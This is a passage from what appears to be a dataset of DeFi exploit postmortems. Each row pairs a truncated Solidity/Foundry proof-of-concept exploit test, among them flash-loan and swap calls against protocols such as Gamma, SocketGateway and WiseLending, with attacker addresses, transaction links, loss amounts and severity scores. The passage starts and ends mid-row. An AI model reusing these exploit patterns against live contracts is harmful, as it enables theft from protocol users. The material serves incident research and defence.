} | true | 5k USD | https://etherscan.io/address/0x1234567a98230550894bf93e2346a8bc5c3b36e3 | https://etherscan.io/address/0xcb4059bb021f4cf9d90267b7961125210cedb792 | https://etherscan.io/address/0x37Ea5f691bCe8459C66fFceeb9cf34ffa32fdadC | https://etherscan.io/tx/0xb5cfa3f86ce9506e2364475dc43c44de444b079d4752edbffcdad7d1654b1f67 | https://t.me/defimon_alerts/1340 | $5.0K | 9.01 | high | GradientMakerPool Exploit (2025-06) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : 24.5 WBNB
// Attacker : https://bscscan.com/address/0x2dea406bb3bea68d6be8d9ef0071fdf63082fb52
// Attack Contract : https://bscscan.com/address/0xe63a5c681cacb8484c8a989cfd... | exploit_poc | BankrollNetwork | 2025-06 | BankrollNetwork_exp.sol | null | e8000c8f3cdcb811 | 2026-01-07T10:59:16.528172 | postmortems | bsc | null | 24.5 WBNB | 24.5 | https://bscscan.com/address/0x2dea406bb3bea68d6be8d9ef0071fdf63082fb52 | https://bscscan.com/address/0xe63a5c681cacb8484c8a989cfdd41b8e3b7a2be2 | https://bscscan.com/address/0xAdEfb902CaB716B8043c5231ae9A50b8b4eE7c4e | https://bscscan.com/tx/0x7226b3947c7e8651982e5bd777bca52d03ea31d19b515dec123595a4435ae22c | https://x.com/Phalcon_xyz/status/1943518566831296566 | https://x.com/TenArmorAlert/status/1935618109802459464 | true | true | false | low | 24.5 WBNB | unknown | function testExploit() public balanceLog {
emit log_named_decimal_uint("[Begin] Attacker WBNB before exploit", WBNB.balanceOf(address(this)), 18);
borrow_amount = 2_000 ether;
pair.swap(0, borrow_amount, address(this), "0x3030");
emit log_named_decimal_uint("[End] Attacker WBNB after e... | true | 24.5 WBNB | https://bscscan.com/address/0x2dea406bb3bea68d6be8d9ef0071fdf63082fb52 | https://bscscan.com/address/0xe63a5c681cacb8484c8a989cfdd41b8e3b7a2be2 | https://bscscan.com/address/0xAdEfb902CaB716B8043c5231ae9A50b8b4eE7c4e | https://bscscan.com/tx/0x7226b3947c7e8651982e5bd777bca52d03ea31d19b515dec123595a4435ae22c | https://x.com/Phalcon_xyz/status/1943518566831296566 | https://x.com/TenArmorAlert/status/1935618109802459464 | $24 | 7.71 | medium | BankrollNetwork Exploit (2025-06) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 16.5k USD
// Attacker : https://bscscan.com/address/0xc49f2938327aa2cdc3f2f89ed17b54b3671f05de
// Attack Contract : https://bscscan.com/address/0x982769c5e5dd77f8308e3cd6eec3... | exploit_poc | Gangsterfinance | 2025-06 | Gangsterfinance_exp.sol | null | c289647f9141ca09 | 2026-01-07T10:59:16.528221 | postmortems | bsc | null | 16.5k USD | 16,500 | https://bscscan.com/address/0xc49f2938327aa2cdc3f2f89ed17b54b3671f05de | https://bscscan.com/address/0x982769c5e5dd77f8308e3cd6eec37da9d8237dc6 | https://bscscan.com/address/0xe968d2e4adc89609773571301abec3399d163c3b | https://bscscan.com/tx/0xf34e59e4fe2c9b454d2b73a1a3f3aaf07d484a0c71ff8278b1c068cdedc4b64d | null | null | true | true | false | medium | 16.5k USD | unknown | function testExploit() public balanceLog {
IUniswapV2Pair(CAKE_LP).swap(borrowAmount, 0, address(this), new bytes(1));
} | true | 16.5k USD | https://bscscan.com/address/0xc49f2938327aa2cdc3f2f89ed17b54b3671f05de | https://bscscan.com/address/0x982769c5e5dd77f8308e3cd6eec37da9d8237dc6 | https://bscscan.com/address/0xe968d2e4adc89609773571301abec3399d163c3b | https://bscscan.com/tx/0xf34e59e4fe2c9b454d2b73a1a3f3aaf07d484a0c71ff8278b1c068cdedc4b64d | $16.5K | 7.26 | medium | Gangsterfinance Exploit (2025-06) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 5k USD
// Attacker : https://bscscan.com/address/0x172dca3e72e4643ce8b7932f4947347c1e49ba6d
// Attack Contract : 0x92c56dd0c9eee1da9f68f6e0f70c4a77de7b2b3c
// Vulnerable Con... | exploit_poc | BankrollStack | 2025-06 | BankrollStack_exp.sol | null | db47a04307148603 | 2026-01-07T10:59:16.528266 | postmortems | bsc | null | 5k USD | 5,000 | https://bscscan.com/address/0x172dca3e72e4643ce8b7932f4947347c1e49ba6d | null | null | https://bscscan.com/tx/0x0706425beba4b3f28d5a8af8be26287aa412d076828ec73d8003445c087af5fd | https://x.com/Phalcon_xyz/status/1943518566831296566 | https://x.com/TenArmorAlert/status/1935618109802459464 | true | true | false | low | 5k USD | unknown | function testExploit() public balanceLog {
IPancakeV3Pool(PancakeV3Pool).flash(address(this), 0, flashAmount, "0x00");
} | true | 5k USD | https://bscscan.com/address/0x172dca3e72e4643ce8b7932f4947347c1e49ba6d | https://bscscan.com/tx/0x0706425beba4b3f28d5a8af8be26287aa412d076828ec73d8003445c087af5fd | https://x.com/Phalcon_xyz/status/1943518566831296566 | https://x.com/TenArmorAlert/status/1935618109802459464 | $5.0K | 6.23 | medium | BankrollStack Exploit (2025-06) | true | false | true | true | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 2M USD
// Attacker : https://bscscan.com/address/0xd5c6f3b71bcceb2ef8332bd8225f5f39e56a122c
// Attack Contract : https://bscscan.com/address/0x7c2565b563e057d482be2bf77796047e5340c57a
// Vulnerable Contract : h... | exploit_poc | unverified_b5cb | 2025-06 | unverified_b5cb_exp.sol | null | 361472be6b223b58 | 2026-01-07T10:59:16.528334 | postmortems | bsc | 52,052,680 | 2M USD | 2,000,000 | https://bscscan.com/address/0xd5c6f3b71bcceb2ef8332bd8225f5f39e56a122c | https://bscscan.com/address/0x7c2565b563e057d482be2bf77796047e5340c57a | https://bscscan.com/address/0xb5cb0555a1d28c9dfdbc14017dae131d5c1cc19c | https://app.blocksec.com/explorer/tx/bsc/0x8c026c3939f7e2d0376d13e30859fa918a5a567348ca1329836df88bef30c73e | https://x.com/TenArmorAlert/status/1937761064713941187 | https://x.com/TenArmorAlert/status/1937761064713941187 | true | true | false | critical | 2M USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c).balanceOf(attacker), 18);
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x2170Ed0880ac9A755fd29B2688956BD959F933F8).balanceOf(attack... | true | 2M USD | https://bscscan.com/address/0xd5c6f3b71bcceb2ef8332bd8225f5f39e56a122c | https://bscscan.com/address/0x7c2565b563e057d482be2bf77796047e5340c57a | https://bscscan.com/address/0xb5cb0555a1d28c9dfdbc14017dae131d5c1cc19c | https://app.blocksec.com/explorer/tx/bsc/0x8c026c3939f7e2d0376d13e30859fa918a5a567348ca1329836df88bef30c73e | https://x.com/TenArmorAlert/status/1937761064713941187 | https://x.com/TenArmorAlert/status/1937761064713941187 | $2.00M | 9 | high | unverified_b5cb Exploit (2025-06) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 14.8K USD
// Attacker : 0x5d4430d14ae1d11526ddac1c1ef01da3b1dae455
// Attack Contract : https://etherscan.io/address/0x8fa5cf0aa8af0e5adc7b43746ea033ca1b8e68de
// Vulnerable Contract :
// Attack Tx : https://a... | exploit_poc | AAVEBoost | 2025-06 | AAVEBoost_exp.sol | null | 64e10590cfb1e432 | 2026-01-07T10:59:16.528417 | postmortems | ethereum | 22,685,443 | 14.8K USD | 14,800 | null | https://etherscan.io/address/0x8fa5cf0aa8af0e5adc7b43746ea033ca1b8e68de | null | https://app.blocksec.com/explorer/tx/eth/0xc4ef3b5e39d862ffcb8ff591fbb587f89d9d4ab56aec70cfb15831782239c0ce | https://x.com/CertiKAlert/status/1933011428157563188 | https://x.com/CertiKAlert/status/1933011428157563188 | true | true | false | medium | 14.8K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", IERC20(0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9).balanceOf(attacker), 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
deal(address(0x7Fc66500c84A76Ad7e9c93437bFc5Ac33... | true | 14.8K USD | https://etherscan.io/address/0x8fa5cf0aa8af0e5adc7b43746ea033ca1b8e68de | https://app.blocksec.com/explorer/tx/eth/0xc4ef3b5e39d862ffcb8ff591fbb587f89d9d4ab56aec70cfb15831782239c0ce | https://x.com/CertiKAlert/status/1933011428157563188 | https://x.com/CertiKAlert/status/1933011428157563188 | $14.8K | 6.7 | medium | AAVEBoost Exploit (2025-06) | true | false | true | true | ||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 48.3K USD
// Attacker : 0x7248939f65bdd23aab9eaab1bc4a4f909567486e
// Attack Contract : https://etherscan.io/address/0xc59d50e26aee2ca34ae11f08924c0bc619728e7c
// Vulnerable Contract :
// Attack Tx : https://b... | exploit_poc | unverified_8490 | 2025-06 | unverified_8490_exp.sol | null | 4de54a6591e516f3 | 2026-01-07T10:59:16.528473 | postmortems | ethereum | 51,190,821 | 48.3K USD | 48,300 | null | https://etherscan.io/address/0xc59d50e26aee2ca34ae11f08924c0bc619728e7c | null | https://bscscan.com/tx/0x9191153c8523d97f3441a08fef1da5e4169d9c2983db9398364071daa33f59d1 | https://x.com/TenArmorAlert/status/1932309011564781774 | https://x.com/TenArmorAlert/status/1932309011564781774 | true | true | false | medium | 48.3K USD | unknown | function testPoC() public {
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance of address(attC)", IERC20(TransparentUpgradeableProxy).balanceOf(address(attC)), 18);
}
}
contra... | true | 48.3K USD | https://etherscan.io/address/0xc59d50e26aee2ca34ae11f08924c0bc619728e7c | https://bscscan.com/tx/0x9191153c8523d97f3441a08fef1da5e4169d9c2983db9398364071daa33f59d1 | https://x.com/TenArmorAlert/status/1932309011564781774 | https://x.com/TenArmorAlert/status/1932309011564781774 | $48.3K | 7.03 | medium | unverified_8490 Exploit (2025-06) | true | false | true | true | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IERC20Custom {
function transfer(address, uint256) external;
}
/*
Vulnerable contract: https://etherscan.io/token/0xc0A6B8c534FaD86dF8FA1AbB17084A70F86EDDc1#code
root cause:... | exploit_poc | Nimbus | 2021-09 | Nimbus_exp.sol | null | 365ec871b6414be5 | 2026-01-07T10:59:16.528522 | postmortems | ethereum | 13,225,516 | null | null | null | null | https://etherscan.io/token/0xc0A6B8c534FaD86dF8FA1AbB17084A70F86EDDc1#code | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
console.log("Before exploiting", IERC20(usdt).balanceOf(address(this)));
uint256 amount = IERC20(usdt).balanceOf(pair) * 99 / 100;
IUniswapV2Pair(pair).swap(amount, 0, address(this), abi.encodePacked(amount));
console.log("After exploiting", IERC20(usdt)... | true | Unknown | 3.8 | low | Nimbus Exploit (2021-09) | false | true | false | false | |||||||
// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Attacker: 0x2708cace7b42302af26f1ab896111d87faeff92f
Attack tx: https://etherscan.io/tx/0x96bf6bd14a81cf19939c0b966389daed778c3a9528a6c5dd7a4d980dec966388
Affected contracts:
0... | exploit_poc | DaoMaker | 2021-09 | DaoMaker_exp.sol | null | 9789092059e7f128 | 2026-01-07T10:59:16.528563 | postmortems | ethereum | 13,155,320 | null | null | null | null | null | https://etherscan.io/tx/0x96bf6bd14a81cf19939c0b966389daed778c3a9528a6c5dd7a4d980dec966388 | null | null | false | false | false | medium | null | unknown | function testExploit() public {
uint256[] memory releasePeriods = new uint256[](1);
releasePeriods[0] = 5_702_400;
uint256[] memory releasePercents = new uint256[](1);
releasePercents[0] = 10_000;
emit log_named_decimal_uint("Before exploiting, Attacker DERC balance", DERC.balan... | true | Unknown | 4.05 | low | DaoMaker Exploit (2021-09) | false | false | true | false | |||||||
// SPDX-License-Identifier: UNLICENSED
// !! THIS FILE WAS AUTOGENERATED BY abi-to-sol v0.5.3. SEE SOURCE BELOW. !!
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IDutchAuction {
function commitEth(
address payable _beneficiary,
bool readAndAgre... | exploit_poc | Sushimiso | 2021-09 | Sushimiso_exp.sol | null | d3b04de1a58b50c2 | 2026-01-07T10:59:16.528604 | postmortems | unknown | 13,038,771 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
payable(address(0)).transfer(79_228_162_414_264_337_593_543_950_335);
emit log_named_uint("Before exploit, ETH balance of attacker:", address(address(this)).balance);
emit log_named_uint("Before exploit, ETH balance of DutchAuction:", address(DutchAuction).balance... | true | Unknown | 2.96 | low | Sushimiso Exploit (2021-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
interface IERC20Custom {
function transfer(address, uint256) external;
}
/*
Vulnerable contract: https://etherscan.io/address/0xa14660a33cc608b902f5bb49c8213bd4c8a4f4ca#code unverified con... | exploit_poc | NowSwap | 2021-09 | NowSwap_exp.sol | null | 4e100dacb1843374 | 2026-01-07T10:59:16.528644 | postmortems | ethereum | 13,225,516 | null | null | null | null | https://etherscan.io/address/0xa14660a33cc608b902f5bb49c8213bd4c8a4f4ca#code | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
console.log("Before exploiting", IERC20(nbu).balanceOf(address(this)));
uint256 amount = IERC20(nbu).balanceOf(pair) * 99 / 100;
IUniswapV2Pair(pair).swap(0, amount, address(this), abi.encodePacked(amount));
console.log("After exploiting", IERC20(nbu).b... | true | Unknown | 3.66 | low | NowSwap Exploit (2021-09) | false | true | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @Analysis
// https://slowmist.medium.com/brief-analysis-of-zabu-finance-being-hacked-44243919ea29
interface ZABUFarm {
function deposit(uint256 _pid, uint256 _amount) external;
function withdraw(uint256 _pid, uint256 _amoun... | exploit_poc | ZABU | 2021-09 | ZABU_exp.sol | null | 385381ce4fc0b780 | 2026-01-07T10:59:16.528696 | postmortems | unknown | 4,177,751 | null | null | null | null | null | null | null | null | false | true | false | medium | null | unknown | function testExploit() public payable {
SPORE.approve(address(Farm), type(uint256).max);
WAVAX.approve(address(Router), type(uint256).max);
(reserve0Pair1, reserve1Pair1,) = PangolinPair1.getReserves();
(reserve0Pair2, reserve1Pair2,) = PangolinPair2.getReserves();
address(WAVAX)... | true | Unknown | 5 | medium | ZABU Exploit (2021-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$180K
// Attacker : https://optimistic.etherscan.io/address/0x1fd0a6a5e232eeba8020a40535ad07013ec4ef12
// Attack Contracts : https://optimistic.etherscan.io/address/0xe... | exploit_poc | NBLGAME | 2024-01 | NBLGAME_exp.sol | flash_loan | 58b8409546c374f8 | 2026-01-07T10:59:16.528758 | postmortems | ethereum | 115,293,068 | ~$180K | 180,000 | https://optimistic.etherscan.io/address/0x1fd0a6a5e232eeba8020a40535ad07013ec4ef12 | null | null | https://app.blocksec.com/explorer/tx/optimism/0xf4fc3b638f1a377cf22b729199a9aeb27fc62fe2983a65c4d14b99ee5c5b2328 | null | null | true | true | true | high | ~$180K | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter USDT balance before attack", USDT.balanceOf(address(this)), USDT.decimals()
);
emit log_named_decimal_uint(
"Exploiter WETH balance before attack", WETH.balanceOf(address(this)), WETH.decimals()
... | true | ~$180K | https://optimistic.etherscan.io/address/0x1fd0a6a5e232eeba8020a40535ad07013ec4ef12 | https://app.blocksec.com/explorer/tx/optimism/0xf4fc3b638f1a377cf22b729199a9aeb27fc62fe2983a65c4d14b99ee5c5b2328 | $180.0K | 9 | high | NBLGAME Exploit (2024-01) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$1K
// Attacker : https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c6706c3c0e17b10397
// Attack Contracts : https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c67... | exploit_poc | PeapodsFinance | 2024-01 | PeapodsFinance_exp.sol | null | 268c08149c461131 | 2026-01-07T10:59:16.528821 | postmortems | ethereum | 19,109,653 | ~$1K | 1,000 | https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c6706c3c0e17b10397 | null | null | https://app.blocksec.com/explorer/tx/eth/0x95c1604789c93f41940a7fd9eca11276975a9a65d250b89a247736287dbd2b7e | null | null | true | false | false | low | ~$1K | unknown | function testExploit() public {
deal(address(DAI), address(this), 200e18);
emit log_named_decimal_uint("Exploiter DAI balance before attack", DAI.balanceOf(address(this)), DAI.decimals());
uint8 i;
while (i < 20) {
DAI.approve(address(ppPP), 10e18);
ppPP.flash(ad... | true | ~$1K | https://etherscan.io/address/0xbed4fbf7c3e36727ccdab4c6706c3c0e17b10397 | https://app.blocksec.com/explorer/tx/eth/0x95c1604789c93f41940a7fd9eca11276975a9a65d250b89a247736287dbd2b7e | $1.0K | 6.74 | medium | PeapodsFinance Exploit (2024-01) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~$319K
// Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
// Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc... | exploit_poc | DAO_SoulMate | 2024-01 | DAO_SoulMate_exp.sol | access_control | 27c0a26d49c28361 | 2026-01-07T10:59:16.528875 | postmortems | ethereum | 19,063,676 | ~$319K | 319,000 | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | null | https://app.blocksec.com/explorer/tx/eth/0x1ea0a2e88efceccb2dd93e6e5cb89e5421666caeefb1e6fc41b68168373da342 | null | null | true | true | true | high | ~$319K | access-control | function testExploit() public {
emit log_named_decimal_uint(
"Exploiter USDC balance before attack", USDC.balanceOf(address(this)), USDC.decimals()
);
emit log_named_decimal_uint("Exploiter DAI balance before attack", DAI.balanceOf(address(this)), DAI.decimals());
emit log_na... | true | ~$319K | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | https://app.blocksec.com/explorer/tx/eth/0x1ea0a2e88efceccb2dd93e6e5cb89e5421666caeefb1e6fc41b68168373da342 | $319.0K | 8.03 | high | DAO_SoulMate Exploit (2024-01) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~464K USD$
// Attacker : https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc
// Attack Contract : https://etherscan.io/address/0x91c49cc7fbfe8f70acee... | exploit_poc | WiseLending03 | 2024-01 | WiseLending03_exp.sol | null | 81dffe5fc637b842 | 2026-01-07T10:59:16.528947 | postmortems | ethereum | null | ~464K USD$ | 464,000 | https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc | https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c | https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4 | https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31 | null | null | true | true | false | high | ~464K USD$ | unknown | function testExploit() public {
deal(address(PendleLPT), address(this), 520_539_781_914_590_517_894);
emit log_named_decimal_uint("Attacker PendleLPT Balance before exploit", PendleLPT.balanceOf(address(this)), 18);
PendleLPT.approve(address(LPTPoolToken), type(uint256).max);
LPTPoolTo... | true | ~464K USD$ | https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc | https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c | https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4 | https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31 | $464.0K | 9 | high | WiseLending03 Exploit (2024-01) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
// @Info
// LQDX LiquidXv2Zap Contract : https://etherscan.io/address/0x364f17a23ae4350319b7491224d10df5796190bc#codeL490
// @NewsTrack
// SlowMist : https://twitter.com/SlowMist_Team/status/1744972012865671452
// Note: the... | exploit_poc | LQDX_alert | 2024-01 | LQDX_alert_exp.sol | null | 13433be766e89bb4 | 2026-01-07T10:59:16.529022 | postmortems | ethereum | 19,165,893 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | function testExploit() public {
vm.startPrank(attacker);
(uint112 lqdx_before, uint112 weth_before,) = WETH_LQDX_pair.getReserves();
emit log_named_uint("before attack, LQDX in the pool", lqdx_before / 1 ether);
emit log_named_uint("before attack, WETH in the pool", weth_before / 1 ether... | true | Unknown | 3.9 | low | LQDX_alert Exploit (2024-01) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.22;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost : ~$6.3m
// Attacker : 0x5351536145610aa448a8bf85ba97c71caf31909c
// Attack Contract : 0xfd42cba85f6567fef32bab24179de21b9851b63e
// Vulnerable Contract : 0x1F1Ca4e8236CD13032653391dB7e9544a6ad123E
//... | exploit_poc | Gamma | 2024-01 | Gamma_exp.sol | flash_loan | 5b09b099d0b041e2 | 2026-01-07T10:59:16.529070 | postmortems | arbitrum | 166,873,291 | ~$6.3m | 6,300,000 | null | null | null | https://arbiscan.io/tx/0x025cf2858723369d606ee3abbc4ec01eab064a97cc9ec578bf91c6908679be75 | null | null | true | true | true | critical | ~$6.3m | flash-loan | function testExploit() public {
uint256 initial_balance = address(this).balance;
I(usdt).approve(usdt_usdce_pool, type(uint256).max);
I(usdce).approve(usdt_usdce_pool, type(uint256).max);
I(weth_usdt_pool).flash(address(this), 0, 3_000_000_000_000, "");
I(weth_usdce_pool).swap(
... | true | ~$6.3m | https://arbiscan.io/tx/0x025cf2858723369d606ee3abbc4ec01eab064a97cc9ec578bf91c6908679be75 | $6.30M | 9 | high | Gamma Exploit (2024-01) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$130K
// Attacker : https://etherscan.io/address/0x7b3a6eff1c9925e509c2b01a389238c1fcc462b6
// Attack Contracts : https://etherscan.io/address/0x356e7481b957be0165d6751... | exploit_poc | BarleyFinance | 2024-01 | BarleyFinance_exp.sol | null | 58373d2ea4e828b0 | 2026-01-07T10:59:16.529135 | postmortems | ethereum | 19,106,654 | ~$130K | 130,000 | https://etherscan.io/address/0x7b3a6eff1c9925e509c2b01a389238c1fcc462b6 | null | null | https://app.blocksec.com/explorer/tx/eth/0x995e880635f4a7462a420a58527023f946710167ea4c6c093d7d193062a33b01 | null | null | true | true | false | high | ~$130K | unknown | function testExploit() public {
// Start with 200 DAI tokens transferred from exploiter to attack contract in txs:
// https://app.blocksec.com/explorer/tx/eth/0xa685928b5102349a5cc50527fec2e03cb136c233505471bdd4363d0ab077a69a
// https://app.blocksec.com/explorer/tx/eth/0xaaa197c7478063eb1124c8d8... | true | ~$130K | https://etherscan.io/address/0x7b3a6eff1c9925e509c2b01a389238c1fcc462b6 | https://app.blocksec.com/explorer/tx/eth/0x995e880635f4a7462a420a58527023f946710167ea4c6c093d7d193062a33b01 | $130.0K | 7.07 | medium | BarleyFinance Exploit (2024-01) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~51K USD
// TX : https://app.blocksec.com/explorer/tx/bsc/0xf477089602fefcfc1dbdce15834476267914d64a1e6a52f07d3f135f091e1d27
// Attacker : https://bscscan.com/address/0... | exploit_poc | XSIJ | 2024-01 | XSIJ_exp.sol | flash_loan | e9cf8528365c90ec | 2026-01-07T10:59:16.529183 | postmortems | bsc | 35,702,095 | ~51K USD | 51,000 | https://bscscan.com/address/0xc4f82210c2952fcec77efe734ab2d9b14e858469 | https://bscscan.com/address/0x5313f4f04fdcc2330ccfa5ba7da2780850d1d7be | null | null | null | null | true | false | true | medium | ~51K USD | flash-loan | function testExploit() public {
emit log_named_decimal_uint(
"Attacker USDT balance before exploit", BUSD.balanceOf(address(this)), BUSD.decimals()
);
DPP.flashLoan(0, 100_000_000_000_000_000_000_000, address(this), new bytes(0x123));
emit log_named_decimal_uint(
... | true | https://bscscan.com/address/0xc4f82210c2952fcec77efe734ab2d9b14e858469 | https://bscscan.com/address/0x5313f4f04fdcc2330ccfa5ba7da2780850d1d7be | $51.0K | 6.48 | medium | XSIJ Exploit (2024-01) | true | false | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "../basetest.sol";
import "./../interface.sol";
interface ISocketGateway {
function executeRoute(uint32 routeId, bytes calldata routeData) external payable returns (bytes memory);
}
interface ISocketVulnRoute {
function performAction(
... | exploit_poc | SocketGateway | 2024-01 | SocketGateway_exp.sol | null | 6608bf07d0a3bc94 | 2026-01-07T10:59:16.529231 | postmortems | ethereum | 19,021,453 | ~3.3M US$ | 3,300,000 | https://etherscan.io/address/0x50DF5a2217588772471B84aDBbe4194A2Ed39066 | https://etherscan.io/address/0xf2D5951bB0A4d14BdcC37b66f919f9A1009C05d1 | https://etherscan.io/address/0x3a23F943181408EAC424116Af7b7790c94Cb97a5 | https://etherscan.io/tx/0xc6c3331fa8c2d30e1ef208424c08c039a89e510df2fb6ae31e5aa40722e28fd6 | https://twitter.com/BeosinAlert/status/1747450173675196674 | https://twitter.com/peckshield/status/1747353782004900274 | true | true | false | critical | ~3.3M US$ | unknown | function testExploit() public balanceLog {
gateway.executeRoute(routeId, getRouteData(_usdc, targetUser));
require(USDC.balanceOf(address(this)) > 0, "no usdc gotten");
} | true | ~3.3M US$ | https://etherscan.io/address/0x50DF5a2217588772471B84aDBbe4194A2Ed39066 | https://etherscan.io/address/0xf2D5951bB0A4d14BdcC37b66f919f9A1009C05d1 | https://etherscan.io/address/0x3a23F943181408EAC424116Af7b7790c94Cb97a5 | https://etherscan.io/tx/0xc6c3331fa8c2d30e1ef208424c08c039a89e510df2fb6ae31e5aa40722e28fd6 | https://twitter.com/BeosinAlert/status/1747450173675196674 | https://twitter.com/peckshield/status/1747353782004900274 | $3.30M | 7.45 | medium | SocketGateway Exploit (2024-01) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.20;
import {Test, console} from "forge-std/Test.sol";
import {IERC20} from "./../interface.sol";
// @KeyInfo - Total Lost : ~464K USD$
// Attacker : https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc
// Attack Contract : https://ethersca... | exploit_poc | WiseLending02 | 2024-01 | WiseLending02_exp.sol | oracle_manipulation | 629a7c86976b4097 | 2026-01-07T10:59:16.529285 | postmortems | ethereum | null | ~464K USD$ | 464,000 | https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc | https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c | https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4 | https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31 | null | null | true | true | true | high | ~464K USD$ | oracle-manipulation | function test_poc() public {
deal(pendleLPT, address(this), 1 ether);
IERC20(pendleLPT).approve(poolToken, MAX);
Pool(poolToken).depositExactAmount(1 ether);
IERC20(poolToken).approve(address(wiseLending), MAX);
uint256 nftId = nft.mintPosition();
wiseLending.deposit... | true | ~464K USD$ | https://etherscan.io/address/0xb90cf1d740b206b6d80854bc525e609dc42b45dc | https://etherscan.io/address/0x91c49cc7fbfe8f70aceeb075952cd64817f9d82c | https://etherscan.io/address/0x37e49bf3749513a02fa535f0cbc383796e8107e4 | https://etherscan.io/tx/0x04e16a79ff928db2fa88619cdd045cdfc7979a61d836c9c9e585b3d6f6d8bc31 | $464.0K | 10 | high | WiseLending02 Exploit (2024-01) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~74 $WBNB
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Attack Contract : https://bscscan.com/address/0x4512abb79f1f80830f4641caefc5ab33654a2d49
